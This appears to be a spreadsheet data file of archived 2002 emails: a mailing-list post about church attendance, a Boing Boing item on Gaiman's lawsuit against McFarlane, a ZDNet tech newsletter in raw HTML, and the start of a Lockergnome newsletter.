 room...
 That's because, of course, most churches are *run* by women. Most
 regular attendants are women. Hell, 65% of all new *ministers*, in
 protestant denominations, at least, are women. No matter your age,
 looks, intelligence, whatever, you'll end up surrounded by women.
 You'll be outnumbered, even several to one -- some of whom are at
 least better looking than you are. :-). The only place where there
 are *more* women running things is in grass-roots Republican politics
 - -- but I won't go there, I promise.
 If I may make a presumption here, since you brought it up, I figure
 that between the sophistication and diversity of the subcontinent's
 religions, and the ubiquity of Indians in various stages of
 assimilation in So/NoCal, you can find some place to hang out near
 you, Rohit. You probably don't even have to go, um, native, like I
 did -- backsliding on my own ostensibly rational godless upbringing
 and becoming, horrors, a Unitarian...
 Cheers,
 RAH
 -----BEGIN PGP SIGNATURE-----
 Version: PGP 7.5
 iQA/AwUBPYjCBcPxH8jf3ohaEQI2vwCbB2UkMyii/XwKQvvJFSWlMMRheBsAmwUB
 jDmfQrNRQED3LmW6V8YutN54
 =vQ/A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</si>
  <si>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Gaiman kicks McFarlane's ass in court
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85524581
 Date: Not supplied
 Neil "Sandman" Gaiman has won his lawsuit against Todd "Spawn" McFarlane, 
 vindicated in his assertion that McFarlane breached his contracts, stole his 
 characters, and used his name. 
     McFarlane looked down somberly as the verdict was read. As the judge polled 
     the individual jury members, he looked at their faces.  
 Link[1] Discuss[2] (_Thanks, Gnat[3]!_)
 [1] http://www.icv2.com/articles/home/1883.html
 [2] http://www.quicktopic.com/boing/H/V9tC6y4mskvW
 [3] http://www.frii.com/~gnat/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: What's facing FBI's new CIO? (Tech Update)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</si>
  <si>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href="http://clickthru.online.com/Click?q=0e--eOTIiQzHxiZSNm4r8dJx98lbK4R" &gt;&lt;img src="http://www.zdnet.com/techupdate/i/itnewsletter_today.gif" width="440" height="60" border="0"  alt="Tech Update Today"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=160 align=center valign=top rowspan=2 bgcolor="#ffffff"&gt;
         &lt;img src="http://www.zdnet.com/techupdate/i/gl_ad2.gif" width="160" height="16" border="0"  alt="Advertisement"&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=23-sFcGINM8KMPAnOMiAv2Y9ZZvQKrR"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15, 2002&lt;/font&gt;&lt;br&gt;&lt;/div&gt;
 &lt;!--DATE--&gt;
         &lt;img src="http://www.zdnet.com/techupdate/i/dots248.gif" width="248" height="5"&gt;&lt;br&gt;
         &lt;img src="http://www.zdnet.com/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;!--LEDE ART--&gt;		
 &lt;table cellpadding=0 cellspacing=0 border=0 align=left&gt;
 &lt;tr valign=top&gt;&lt;td width="90"&gt;&lt;img src="http://image.com.com/techupdate/i/dfarber.jpg" width="85" height="110" border="0"&gt;&lt;/td&gt;&lt;/tr&gt;
  &lt;/table&gt;
 &lt;!--LEDE ART--&gt;
            &lt;font face="arial, helvetica" size="-1"&gt;
        &lt;b&gt;Dan Farber&lt;/b&gt;&lt;br&gt;
 &lt;font size="+1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=38-bLkmIRM2PY08XJfnhJiSUxuD-DiR" &gt;
 &lt;b&gt;Unplugged: FBI CIO Darwin John&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 In the twilight of his career, an IT veteran takes on the formidable task of transforming the FBI's antiquated technology infrastructure. He's being sworn in today.
 &lt;br&gt;
      &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;&lt;font size="-1"&gt;
 	 &lt;a href="http://clickthru.online.com/Click?q=4e-0Y95InZASFVHi6JIKlsTn8N_Jj9R" &gt;
 	 &lt;b&gt;Read my interview with Darwin John&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=63-tPKjIHWSgV_ryftg_9-hwkp_WEcR" &gt;Yopy brings Linux to wider audience&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=78-d5asIdUDupSdE5R5vnMUN5xspoRR" &gt;Activists to ISPs: Don't be a stoolpigeon&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7notyCugUpIiSupcptbPMPR" &gt;New Athlon to launch in stormy seas
 &lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a2-6-M7QXZx3gj1YAK9R0CGk_HtsonR" &gt;Wireless companies ripe for consolidation&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b7-FOgPQ8Jxs54h15z0NpbnpTbdL3eR" &gt;W3C boosts Web services language
 &lt;/a&gt;&lt;br&gt;
  &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=cc-h4fQQ0Oq5aj8C567qeZDozn6f5yR" &gt;Cisco hooks up airport 'hot spots'&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e2-J1OpQhyzY9mCJDBENBEZdihv9KnR" &gt;Palm, Handspring win patent spat&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f7-N0QnQLgzfY038fNlrZIGiR6ImOeR"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color="#990000"&gt;&lt;b&gt;David's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src="http://www.zdnet.com/techupdate/i/dberlind.gif"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size="+1"&gt;&lt;b&gt;IT sees new profits in Old Glory&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Can CRM be tweaked to track terrorists? As the fight against &lt;b&gt;terrorism&lt;/b&gt; heats up, the government turns to the tech industry to come up with tools to secure the country against attack. It's an opportunity for patriotism--and for profits. (Nearly $38 billion is slated for homeland security.) &lt;b&gt;Software companies&lt;/b&gt;  are sending tens of thousands of proposals to government agencies, some of which are so new they don't have the budget to hire people to evaluate them all.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr2qb7TCEfNv0T0QkY6b7PR" &gt;
 &lt;b&gt;Read more the ZDNet News Focus&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 1--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Are Spam blocklists going too far?&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Many businesses are turning to spam-filtering tools to regain
 control of their e-mail boxes. But legitimate e-mails are being 
 deleted, too, now that &lt;b&gt;sometimes-indiscriminate blacklists&lt;/b&gt; have
 become a key weapon in the war against unsolicited bulk e-mail.
  Companies
 subscribe to the lists, bouncing any traffic directed to their
 servers that originates from those addresses. Is &lt;b&gt;overkill&lt;/b&gt; the
 answer to stopping spam? What is your company doing to stop
 junk e-mail?
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=22-xNrrIrdA8QrRyU0uo4I9yc99NcnR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
   &lt;!-- STORY 2 --&gt;
   &lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="left"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/wayne_rash85x110.jpg" width="85" height="110" border="0" align="left"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;
   &lt;b&gt;Attacks are on the rise&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 No, you're not paranoid. &lt;b&gt;Wayne Rash&lt;/b&gt; warns that the number of
 attacks on Internet-connected networks is increasing, with no 
 sign of letting up. Here's what you can do to protect your
 business against malicious attacks.
 &lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzF4PGTWRMQ93KjZ6eJcneR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;P&gt;
 &lt;!-- STORY 3 --&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Gartner unfolds Sun's server roadmap&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Sun's midframe and high-end servers will see only evolutionary
 change through 2006--faster processors, support for PCI-X I/O, 
 and InfiniBand, according to &lt;b&gt;Gartner&lt;/b&gt;. More significant
 developments will come through software, with moves toward
 providing public utility-style availability and capacity. But Gartner
 adds note of caution concerning &lt;b&gt;Sun's credibility&lt;/b&gt;.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpIbJQLDdyAu7hgvo2AKesR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 4--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;'My favorite PDA is the Nokia 9290'&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Tired of carrying around both PDA and phone, reader &lt;b&gt;John Maravilla &lt;/b&gt;says he spent a year "looking for a decent integrated PDA/phone" before finding the Nokia 9290. Then he read my "&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=61-x9oAIoLjvQVtYF24JYndFK-AWlFR" &gt;What to look for in your next PDA/phone&lt;/b&gt;&lt;/a&gt;" and wrote to reassure me that I'm &lt;i&gt;not&lt;/i&gt; crazy for liking a PDA  resembling a cell phone from the Reagan era.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBPTWRdqTr1okYP2r70U69R" &gt;
 &lt;b&gt;Read his full letter&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8b-SBGBQY0y2ojuiY1EYIEElDh4B1rR" &gt;
 &lt;b&gt;"What to look for in your next PDA/phone"&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 5--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;A hulk of a system&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 How much does a cutting-edge PC cost these days? Plenty--but &lt;b&gt;Sys Performance 2533&lt;/b&gt; delivers a lot in return. It's packed to the rafters with high-end components, and boasts the &lt;b&gt;highest office-productivity score&lt;/b&gt; ZDNet reviewers have seen.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a0-11h8QQBqNNGVwDiUByjw2PB1s7iR" &gt;
 &lt;b&gt;Read the full review&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
  &lt;img src="http://www.zdnet.com/enterprise/graphics/071202sys2533.jpg" width="400" height="206" border="0"&gt;&lt;br&gt;
 &lt;p&gt;
 &lt;!-- story 6 --&gt;
 &lt;!--&lt;font size="+1"&gt;&lt;b&gt;Cell phone personality test&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Whether you're a total gear head or you like to keep things simple, 
 take our cell phone personality test to find out which models suit you best.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b5-50FcQ7U79NPLUfR1PHq15ZNEEZPR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=cb-CjRIQJsr-vmTnIHyXYHRf_uaHkrR" &gt;
 &lt;b&gt;David Berlind's Rx for mobile happiness&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;--&gt;
 &lt;!-- Write to me --&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;Write me at &lt;a href="mailto:david.berlind@cnet.com"&gt;&lt;b&gt;david.berlind@cnet.com&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=e0-cISRQfDHKLzGGtYkPhB7mxUT9AiR"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href="http://clickthru.online.com/Click?q=f6-QktIQMwrVvC8LAXYYRGOT9_Jmp4R" &gt;"Embedded XP isn't the remedy."&lt;/a&gt;&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;  &lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 --&gt;
 &lt;!--end quote block--&gt;
         &lt;!-- review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href="http://clickthru.online.com/Click?q=0b-0NI-INQ4zccFD6_GftmZCtvxYhrR" &gt;
 &lt;b&gt;Next MS Office? Here's what to add--and delete&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 The next version of Microsoft Office is due in the next year or so. If you were product manager for the industry-standard office suite, what would you add? What would you get rid of? What would you fix? Here's &lt;b&gt;David Coursey's&lt;/b&gt; wish-list.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
         &lt;!-- feature --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;Q&amp;A&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=20-PoiFIRzzEy9aiyBtR-pp7us2QfiR" &gt;
 &lt;b&gt;We can handle CEO cheats&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;b&gt;Phil Bond,&lt;/b&gt; the U.S. undersecretary of commerce for technology, explains why the financial industry can ride out the current 
 storm without major government intervention.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 		        &lt;!-- download --&gt;
         &lt;!-- /coming tomorrow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href="http://clickthru.online.com/Click?q=35-d6JTIbIziyEmlvLKNXLTSyPWc3PR" &gt;
 &lt;b&gt;Oracle issues a new challenge to Microsoft&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Oracle's new &lt;b&gt;Collaboration Suite&lt;/b&gt; includes e-mail, calendar and messaging software and is less expensive than Microsoft's offerings, says Oracle CEO &lt;i&gt;Larry Ellison&lt;/i&gt;.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size="-2"&gt;&lt;b&gt;Networking&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign="top"&gt;
 	&lt;td width="85"&gt;&lt;a href="http://clickthru.online.com/Click?q=4a-HcgUIPpcJUKLco9sxoLkkTKhn-dR" &gt;&lt;img src="http://www.zdnet.com/products/graphics/052302gateway.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX_Z7cRa46fez6pa6cIJuR" style="text-decoration:none"&gt;&lt;b&gt;Find the right home network&lt;/b&gt;&lt;/a&gt; &lt;br /&gt;Choosing the right technology to match your networking needs is vital. Here's help in making the choice.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=74-VAV8IZZSXVx6EnQRYG8Y0gSPZxsR" style="text-decoration:none"&gt;Read reviews&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;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&lt;b&gt;Networking&lt;/b&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;1&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=89-h28bQ-J1j6GWV5lkUMBXB6W5WWlR" style="text-decoration:none"&gt;Linksys EtherFast wireless AP&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;2&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JdPHsS86jYlcGhVIlcU_eR" style="text-decoration:none"&gt;Linksys EtherFast router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;3&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z1uGcyfxkqJzDxDXozLCyR" style="text-decoration:none"&gt;Siemens SpeedStream router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;4&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgkBBzo4WYjg0SxiPZvH6lR" style="text-decoration:none"&gt;Wireless 802.11B Router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;5&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=de-7tpkQMWawxfQtEatTbDS-BJjho4R" style="text-decoration:none"&gt;NetGear HE102 802.11a wireless AP&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOwQdNmMSpCs3CyJqsjeorR" &gt;More popular networking products&lt;/a&gt;&lt;/b&gt;&lt;br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href="http://clickthru.online.com/Click?q=08-IFoQIRjFBPPvKmBg3F-erCpGY9iR" &gt;Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQFRzNejKHRl28NRQSnqQPR" &gt;Clearance Center: Get discounts on PCs, PDAs, MP3 players and more!&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=38-bLkmIRM2PY08NJ_nhJiSUxuD-DiR" &gt;Find out the top 10 Web services security requirements at Tech Update.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=4d--URsIKZDjpsN0htdaB0S22bbKAZR" &gt;Builder.com shows you how to bring Java to the masses with Cold Fusion MX.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=62-4oBiIePgpIHMGiyG9TmIKJ15BRdR" &gt;Check out thousands of IT job listings in ZDNet's Career Center.&lt;/A&gt;
 &lt;/b&gt;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href='http://clickthru.online.com/Click?q=77-u6t6zqpp7M-je7UgALAv-lzJplMsr9RR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=8c-Ld7aQ6JBhwf2vJBVFm8il40AWNyR" &gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=a1-AfVtQ-ZKIjbdzFlGkeHaXeD3gBlR"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href="http://clickthru.online.com/Click?q=b7-FOgPQ8Jxs54D2Ik0NpbnpTbdL3eR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=cc-h4fQQ0Oq5ajRRIT7qeZDozn6f5yR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=e1-6RvNQxk2EgkosAnPhsYK3Awi9qlR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=f6-QktIQMwrVvCRWA6YYRGOT9_Jmp4R" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=0b-0NI-INQ4zccSy6XGftmZCtvxYhrR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=20-PoiFIRzzEy93byDtR-pp7us2QfiR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=35-d6JTIbIziyEs2vxKNXLTSyPWc3PR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=4a-HcgUIPpcJUKdNolsxoLkkTKhn-dR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX_Z7Yqas6fez6pa6cIJuR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e539&amp;ISSUE=2002-07-15" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=75-whVtnGU1zF-4ro34QEZUwvJzBdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/daily/20020718.html"&gt;
       http://www.lockergnome.com/issues/daily/20020718.html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&lt;/style&gt;&lt;title&gt;20020718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07.18.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;GET WINDOWS XP TIPS:&lt;/b&gt; Months after the release of Windows XP Professional and Home editions, people are still learning the nuances of Microsoft's newest operating system. Whether you've been using it for a while or are planning to upgrade to the new OS soon, this ebook is right up your alley. &lt;a href="http://store.eSellerate.net/s.asp?s=STR550611850&amp;Cmd=BUY&amp;SKURefnum=SKU3000768669&amp;AFFIDC=AFF669529939"&gt;GET YOUR COPY&lt;/a&gt; of Lockergnome's Top 50 Windows XP tips now!    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 I don't go to many concerts, but that doesn't mean I don't
 appreciate listening to &lt;a href="http://mp3.lockergnome.com/"&gt;good
 music&lt;/a&gt; at every waking moment. Tonight, a handful of Bay
 Gnomies and I watched They Might Be Giants rock the Fillmore.
 Melanie, Steve, Brent, Missy, Robert, Patrick, Gretchen, Matt, and
 Mindy had a total blast. Well, it wasn't much fun when Robert got
 his digital camera confiscated - but this was a show worthy of
 five &lt;a href="http://www.squeeek.com/brent/blog-archives/000438.html"&gt;megapixels&lt;/a&gt;
 (believe me)! Brent went to
 the show last night, and I saw them play on the set earlier this
 afternoon. They were selling a new CD (which had JUST been
 released the other day); "They Got Lost" is full of a few
 previously-unavailable tracks. If you aren't sure about purchasing
 it outright, I strongly urge you to sign up for a trial &lt;a
 href="http://mp3.lockergnome.com/"&gt;EMusic account&lt;/a&gt; and download
 a few of their songs in MP3 format. Oh, and check out the opening
 act: Noe Venable. She's got
 &lt;a href="http://www.noevenable.com/music.php"&gt;a few free MP3s&lt;/a&gt; on
 her site, too. Give "Boots" a shot - very nice.
 &lt;p&gt;
 Does anybody know how to set a binary clock? Melanie got it for me
 as a gift (which was a very nice gesture). Sure, I could read the
 manual - but the ones and zeros start to look eerily similar after
 flipping past the first page. You know me: I'm not much of a math
 guy. In fact, I just discovered the other day that 'byte' was
 short for 'by eight' (even though I already knew that 'bit'
 represented 'binary digit'). I'd stick with a digital timepiece,
 but it just isn't geeky enough for me anymore. How sad is that?
 I'm ready to walk on the wild side. Maybe I'll get my laptop
 pierced tomorrow? It could happen. I've been known to do nutty
 things on a moment's notice, like changing my default Web browser.
 Courtesy of &lt;a href="http://www.newarchitectmag.com/documents/s=2415/na0802q/"&gt;Asa
 Dotzler&lt;/a&gt;, I have an official Mozilla sticker, CD, and t-shirt
 (which you saw me model in my Webcam the other day). Don't be too
 jealous; &lt;a href="http://www.mozilla.org/"&gt;Mozilla.org&lt;/a&gt; has
 plenty of goodies to go around.
 &lt;p&gt;
 Looks as though &lt;a href="http://www.lockergnome.com/issues/digitalmedia/20020717.html"&gt;Jake
 and Lori&lt;/a&gt; are already having a blast in St. Louis.
 They're at the Shareware Industry Conference, along with hundreds
 of well-known program programmers - the people who make our
 computers work the way we want them to work! We're doing our best
 to convince them to join us at &lt;a href="http://www.gnomedex.com/"&gt;Gnomedex&lt;/a&gt;. They ask: "Who else
 is going to be there?" We answer: "People who don't know you yet."
 They ask: "Then why should I come?" We answer: "Because it's a
 business opportunity for you." They ask: "What if I don't want to
 learn anything or meet anybody?" We answer: "We can't really help
 you there, but here - have lunch on us." They ask: "Oh, the
 admission price includes food at at Gnomedex?" We answer: "We
 cannot provide every meal, but you won't go hungry." They ask:
 "So, why Des Moines, when there's nothing to do there." We answer:
 "You're 100% wrong. There *IS* something to do there: Gnomedex."
 Get it? Got it? Good.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&lt;table align="right" bgcolor="#FFFFFF" cellspacing="0" cellpadding="10"&gt;&lt;tr&gt;&lt;td&gt;&lt;table align="left" bgcolor="#990000" cellspacing="0" cellpadding="2"&gt;&lt;tr&gt;&lt;td&gt;&lt;table border="0" cellpadding="4" cellspacing="0"&gt;
